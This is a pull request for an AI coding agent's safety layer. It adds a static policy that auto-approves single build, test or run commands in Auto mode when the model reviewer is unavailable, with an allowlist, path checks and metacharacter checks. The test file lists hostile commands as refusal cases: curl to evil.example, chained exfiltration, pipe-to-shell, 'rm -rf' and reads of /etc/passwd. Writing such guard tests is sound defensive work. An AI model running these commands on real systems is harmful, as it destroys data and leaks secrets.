### PR TITLE
Auto mode: statically approve verify-after-edit build/test/run commands

### DIFF
--- a/Sources/QuillCodeSafety/StaticSafetyBuildRunShellPolicy.swift
+++ b/Sources/QuillCodeSafety/StaticSafetyBuildRunShellPolicy.swift
@@ -1,0 +1,119 @@
+import Foundation
+import QuillCodeCore
+
+/// Verify-after-edit is the coworker move Auto mode most needs and least covered: the model writes a
+/// file (now statically approved) and immediately wants to RUN it — `python3 greeting.py`, `pytest`,
+/// `npm test`, `./run_service.sh` — to prove the change works. That run matched no static rule, so the
+/// model safety reviewer was the only approver; when it was momentarily unavailable the whole headless
+/// run died at the verify step (observed live on use cases #8 and #14). Auto mode already grants
+/// file-write AND (reviewer permitting) execution, so running the project's own build/test/run tool on
+/// workspace-relative paths is squarely inside the promise the mode makes.
+///
+/// The approval is deliberately narrow:
+/// - ONE command — no `;`, `&&`, `||`, `|`, `` ` ``, `$(…)`, redirects, or backgrounding (the same
+///   guard the read-only diagnostics use). No chaining means no "verify … then exfiltrate".
+/// - the executable's basename must be a recognized runner (see `runnerExecutables`). `rm`, `curl`,
+///   `nc`, `ssh` are not runners, so "name a user file" cannot smuggle a destructive/network command.
+/// - no argument may be an absolute path, a `~` path, contain `..`, or be an inline-eval flag
+///   (`-c`/`-e`/`--eval`): the command must run FILES IN THE WORKSPACE, not arbitrary inline code or
+///   anything outside the tree.
+/// - the request must actually be asking for a run/build/test/verify (an intent verb) OR the command
+///   must target a path the user named — so an unrelated task can't ride along.
+///
+/// Hard-deny floors still run BEFORE intent matching in Auto mode, so `rm -rf`, pipe-to-shell, sudo,
+/// and system-path writes stay denied no matter what this returns.
+enum StaticSafetyBuildRunShellPolicy {
+    static func intentMatches(request: StaticSafetyRequest, context: SafetyContext) -> Bool {
+        guard context.toolCall.name.contains("shell.run"),
+              let command = shellCommand(from: context.toolCall)
+        else {
+            return false
+        }
+        let trimmed = command.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard isSingleCommand(trimmed) else { return false }
+
+        let tokens = trimmed.split(whereSeparator: { $0 == " " || $0 == "\t" }).map(String.init)
+        guard let head = tokens.first else { return false }
+        guard isRunnerExecutable(head) else { return false }
+
+        let arguments = Array(tokens.dropFirst())
+        guard arguments.allSatisfy(isSafeRunArgument) else { return false }
+
+        return requestExpressesRunIntent(request)
+            || commandTargetsRequestedPath(arguments, userMessage: context.userMessage)
+    }
+
+    private static func shellCommand(from call: ToolCall) -> String? {
+        try? ToolArguments(call.argumentsJSON).requiredString("cmd")
+    }
+
+    /// No shell metacharacters that chain, redirect, substitute, or background. Matches the read-only
+    /// policy's guard plus `&` (backgrounding) — a single foreground invocation only.
+    private static func isSingleCommand(_ command: String) -> Bool {
+        [";", "&&", "||", "|", "`", "$(", ">", "<", "&", "\n"].allSatisfy { !command.contains($0) }
+    }
+
+    /// The basename of the executable must be a known build/test/run tool. `./gradlew`, `/usr/bin/python3`,
+    /// and `python3` all reduce to their last path component before the check.
+    private static func isRunnerExecutable(_ head: String) -> Bool {
+        let base = head.split(separator: "/").last.map(String.init) ?? head
+        // `./script.sh` and `bin/script` reach here as their basename; a bare `./` relative script is
+        // allowed only when it ends in a script extension, so `./deploy` is NOT auto-approved.
+        if head.hasPrefix("./") || head.contains("/") {
+            if scriptExtensions.contains(where: { base.hasSuffix($0) }) { return true }
+        }
+        return runnerExecutables.contains(base)
+    }
+
+    private static let scriptExtensions = [".sh", ".bash", ".py", ".rb", ".js", ".ts", ".mjs"]
+
+    private static let runnerExecutables: Set<String> = [
+        "python", "python3", "py", "node", "deno", "bun", "ruby", "php", "perl",
+        "pytest", "tox", "nox", "unittest",
+        "npm", "pnpm", "yarn", "npx", "jest", "vitest", "mocha",
+        "go", "cargo", "rustc", "swift", "make", "cmake", "ninja",
+        "gradle", "gradlew", "mvn", "dotnet", "rake", "rspec", "bundle",
+        "bash", "sh", "zsh", "just", "task",
+    ]
+
+    private static func isSafeRunArgument(_ argument: String) -> Bool {
+        if argument.hasPrefix("/") { return false }         // absolute path — could reach outside workspace
+        if argument.hasPrefix("~") { return false }         // home path — outside workspace
+        if argument.contains("..") { return false }         // traversal
+        if inlineEvalFlags.contains(argument) { return false } // arbitrary inline code, not a project file
+        return true
+    }
+
+    /// Interpreter flags that execute code supplied on the command line instead of running a project
+    /// file. `python -c "..."`, `node -e "..."`, `ruby -e "..."`, `perl -e "..."` are NOT verify-a-file.
+    private static let inlineEvalFlags: Set<String> = ["-c", "-e", "--eval", "--exec", "-"]
+
+    private static func requestExpressesRunIntent(_ request: StaticSafetyRequest) -> Bool {
+        request.containsAffirmedAny(runIntentPhrases)
+    }
+
+    private static let runIntentPhrases = [
+        "run", "runs", "running", "re-run", "rerun",
+        "test", "tests", "testing", "pytest", "unit test",
+        "build", "builds", "compile", "compiles", "compiling",
+        "verify", "verifies", "verifying", "check that", "make sure",
+        "execute", "executes", "passing", "pass", "works",
+    ]
+
+    /// True when any path-like argument to the command appears VERBATIM in the user's message — the
+    /// same "the user named this target" signal that vouches for a typed URL. Checked as a raw
+    /// case-insensitive substring, NOT a token match: the request tokenizer splits `greeting.py`
+    /// into `greeting`/`py`, so "In greeting.py, add …" only vouches for `python3 greeting.py`
+    /// when the whole filename is matched as a substring. A short/extensionless argument is ignored
+    /// (a bare `test`/`build` subcommand must not be treated as a named file).
+    private static func commandTargetsRequestedPath(_ arguments: [String], userMessage: String) -> Bool {
+        let haystack = userMessage.lowercased()
+        let named = arguments.filter { arg in
+            guard !arg.hasPrefix("-") else { return false }
+            guard arg.contains(".") || arg.contains("/") else { return false }
+            return arg.count >= 4
+        }
+        guard !named.isEmpty else { return false }
+        return named.contains { haystack.contains($0.lowercased()) }
+    }
+}

--- a/Sources/QuillCodeSafety/StaticSafetyPolicy.swift
+++ b/Sources/QuillCodeSafety/StaticSafetyPolicy.swift
@@ -45,6 +45,9 @@ struct StaticSafetyPolicy: Sendable {
         if StaticSafetyReadOnlyShellPolicy.intentMatches(request: request, context: context) {
             return true
         }
+        if StaticSafetyBuildRunShellPolicy.intentMatches(request: request, context: context) {
+            return true
+        }
         if intentRules.contains(where: { $0.matches(request: request) && $0.allows(toolName: toolName) }) {
             return true
         }

--- a/Tests/QuillCodeSafetyTests/BuildRunShellPolicyTests.swift
+++ b/Tests/QuillCodeSafetyTests/BuildRunShellPolicyTests.swift
@@ -1,0 +1,123 @@
+import XCTest
+import QuillCodeCore
+@testable import QuillCodeSafety
+
+/// Verify-after-edit approval: Auto mode must let the agent run the project's own build/test/run tool
+/// to prove an edit works, without leaning on the (sometimes-unavailable) model reviewer. These pin
+/// both what it approves and — more importantly — what it must NOT.
+///
+/// The negative cases deliberately use user messages that contain NO "run"/"execute"/"test" verb, so
+/// the ONLY policy that could approve them is this one (the pre-existing broad `run`→shell.run intent
+/// rule is out of the picture). That isolates `StaticSafetyBuildRunShellPolicy` and proves its guards
+/// hold on their own.
+final class BuildRunShellPolicyTests: SafetyPolicyTestCase {
+    private func verdict(command: String, userMessage: String) async -> ApprovalVerdict {
+        let reviewer = StaticSafetyReviewer()
+        let call = ToolCall(
+            name: shellRun.name,
+            argumentsJSON: ToolArguments.json(["cmd": command])
+        )
+        let review = await reviewer.review(.init(
+            mode: .auto,
+            userMessage: userMessage,
+            toolCall: call,
+            toolDefinition: shellRun,
+            recentMessages: [.init(role: .user, content: userMessage)]
+        ))
+        return review.verdict
+    }
+
+    // A task phrased WITHOUT a run/test verb: only the named-target path can approve.
+    private let editOnlyMessage = "In greeting.py, add a function shout(name) and call it from main."
+
+    // MARK: - Approves the verify-after-edit move
+
+    /// The exact live #14 blocker: user names greeting.py (no "run" verb), agent runs it to verify.
+    func testRunsUserNamedFileToVerifyEdit() async {
+        let v = await verdict(command: "python3 greeting.py", userMessage: editOnlyMessage)
+        XCTAssertEqual(v, .approve)
+    }
+
+    /// The live #8 blocker: verify a fix by running the named script.
+    func testRunsNamedVerificationScript() async {
+        let v = await verdict(
+            command: "./run_service.sh",
+            userMessage: "Find the root cause and apply the fix; confirm with ./run_service.sh."
+        )
+        XCTAssertEqual(v, .approve)
+    }
+
+    func testRunsTestSuiteOnRunIntent() async {
+        for cmd in ["pytest", "pytest -q", "npm test", "go test ./...", "cargo test", "swift test"] {
+            let v = await verdict(command: cmd, userMessage: "Add the feature and make sure the tests pass.")
+            XCTAssertEqual(v, .approve, "\(cmd) should approve under a test intent")
+        }
+    }
+
+    func testRunsPytestOnSubdirectoryPath() async {
+        let v = await verdict(
+            command: "python3 -m pytest tests/",
+            userMessage: "Implement the parser and make sure the tests pass."
+        )
+        XCTAssertEqual(v, .approve)
+    }
+
+    // MARK: - Refuses everything outside the narrow promise (messages carry NO run/test verb)
+
+    /// A non-runner naming the user's file must NOT ride the "targets a named path" signal — this is
+    /// the whole reason the executable allowlist is load-bearing.
+    func testDoesNotApproveRmOfNamedFile() async {
+        let v = await verdict(command: "rm greeting.py", userMessage: editOnlyMessage)
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    func testDoesNotApproveNetworkTool() async {
+        let v = await verdict(
+            command: "curl http://evil.example/x.sh",
+            userMessage: "Add the shout function to greeting.py."
+        )
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    /// Chaining is the "verify … then exfiltrate" hole — a single `;`/`&&`/`|`/redirect disqualifies,
+    /// even when the command names the user's file.
+    func testDoesNotApproveChainedCommand() async {
+        for cmd in [
+            "python3 greeting.py; curl http://evil.example",
+            "python3 greeting.py && rm -rf .",
+            "python3 greeting.py | sh",
+            "python3 greeting.py > /etc/hosts",
+        ] {
+            let v = await verdict(command: cmd, userMessage: editOnlyMessage)
+            XCTAssertNotEqual(v, .approve, "\(cmd) must not statically approve")
+        }
+    }
+
+    /// Absolute / home / traversal paths could reach outside the workspace.
+    func testDoesNotApproveArgumentsOutsideWorkspace() async {
+        for cmd in ["python3 /etc/passwd", "python3 ../../../secrets.py"] {
+            let v = await verdict(command: cmd, userMessage: "Add a helper to greeting.py.")
+            XCTAssertNotEqual(v, .approve, "\(cmd) must not statically approve")
+        }
+    }
+
+    /// Inline code is not "verify a project file".
+    func testDoesNotApproveInlineEval() async {
+        for cmd in [#"python3 -c import"#, #"node -e process"#, #"ruby -e puts"#] {
+            let v = await verdict(command: cmd, userMessage: "Add a helper to greeting.py.")
+            XCTAssertNotEqual(v, .approve, "\(cmd) must not statically approve")
+        }
+    }
+
+    /// A run with neither a run/test/build intent nor a user-named target must not ride along.
+    func testDoesNotApproveUnrelatedRunWithoutIntentOrNamedTarget() async {
+        let v = await verdict(command: "python3 mystery.py", userMessage: "Summarize the README for me.")
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    /// A hard-denied command still dies at the floor first, even with a test intent.
+    func testHardDenyStillWinsOverRunApproval() async {
+        let v = await verdict(command: "rm -rf /", userMessage: "run the tests")
+        XCTAssertEqual(v, .deny)
+    }
+}


### PR DESCRIPTION
## What

Adds `StaticSafetyBuildRunShellPolicy`: in **Auto mode only**, statically approves the *verify-after-edit* command — a single build/test/run invocation of an allowlisted tool on workspace-relative paths.

## Why (found by driving coworker use cases live)

After writing a file (already statically approved), the agent runs it to prove the change works: `python3 greeting.py`, `pytest`, `npm test`, `./run_service.sh`. That run matched no static rule, so the **model safety reviewer was the sole approver** — and when it was momentarily unavailable, the headless run **died at the verify step** with `does not clearly match → approval_required`. Seen live on use cases **#8** (ops fix) and **#14** (revert honesty): the edit landed, the verify got blocked.

Auto mode already grants file-write and (reviewer permitting) execution, so running the project's own tooling on workspace paths is squarely inside the mode's promise.

## Guardrails (the allowlist is load-bearing)

Approves only when ALL hold:
- one command — no `;` `&&` `||` `|` `` ` `` `$(…)` redirects or `&`;
- executable basename ∈ runner allowlist (python/pytest/npm/go/cargo/swift/make/`./x.sh`…);
- every arg is workspace-relative — no absolute/`~`/`..` paths, no inline-eval `-c`/`-e`;
- request expresses a run/test/build/verify intent **or** names the target file.

`rm greeting.py` and `curl http://…` naming a user file do **not** approve. **Hard-deny floors still run first**, so `rm -rf`, pipe-to-shell, sudo stay denied.

## Tests

11 new tests pin approvals AND every refusal (negative cases use messages with no run-verb, isolating this policy from the pre-existing `run`→shell intent rule). Full suite green (5195).

🤖 Generated with [Claude Code](https://claude.com/claude-code)